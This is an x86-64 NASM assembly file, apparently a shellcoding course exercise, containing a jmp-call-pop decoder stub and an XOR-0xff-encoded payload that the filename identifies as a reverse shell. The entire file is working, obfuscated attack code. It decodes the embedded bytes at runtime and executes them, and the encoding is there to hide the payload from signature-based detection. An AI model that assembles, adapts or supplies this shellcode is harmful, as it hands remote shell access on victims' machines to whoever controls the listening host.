;-----------------------------
; ch09-revshell64-decoder.nasm
; by Michael Born (@blu3gl0w13)
; Date: 2019
;-----------------------------


global _start

section .text

_start:
	jmp eeeee



ccccc:
	pop r10
	xor rcx,rcx
	mov cl, shellClen

ddddd:
	xor byte [r10], 0xff
	inc r10
	loop ddddd
	jmp short shellC



eeeee:
	xor r10, r10
	call ccccc
	shellC: db 0xb7,0xce,0x3f,0x4f,0xd6,0xb7,0xce,0x00,0xbf,0x7f,0x38,0xfd,0xb7,0xce,0x09,0xb7,0x7c,0x39,0xfe,0xb7,0xce,0x2d,0xf0,0xfa,0xb7,0x76,0x38,0xb7,0xce,0x3f,0xaf,0x38,0xbb,0xdb,0x03,0x80,0xfe,0xfe,0xfe,0x99,0x38,0xbb,0xdb,0x05,0x85,0x96,0x76,0xbb,0xdb,0x09,0x39,0xbb,0xdb,0x07,0xfd,0xb7,0x7c,0x13,0xf7,0xb7,0xce,0x3f,0x4f,0xd5,0xb7,0x76,0x19,0xb7,0xce,0x2d,0xb7,0x7c,0x3d,0xef,0xf0,0xfa,0xb7,0xce,0x3f,0x4f,0xde,0xb7,0xce,0x09,0xf0,0xfa,0xb7,0xce,0x3f,0x4f,0xde,0xb7,0x00,0x39,0xf0,0xfa,0xb7,0xce,0x3f,0x4f,0xde,0xb7,0x00,0x39,0xf0,0xfa,0xb7,0xce,0x3f,0xaf,0xb7,0xce,0x24,0xb7,0x44,0xd0,0xd0,0xd0,0xd0,0x9d,0x9e,0x8c,0x97,0xac,0xb7,0x44,0xd0,0xd0,0xd0,0xd0,0xd0,0x9d,0x96,0x91,0xac,0xb7,0x76,0x18,0xaf,0x99,0x97,0xd2,0x96,0xb7,0x76,0x19,0xaf,0xa9,0xa8,0xb7,0x76,0x19,0xb7,0xce,0x2d,0xb7,0x7c,0x3f,0xc4,0xf0,0xfa
	shellClen: equ $-shellC
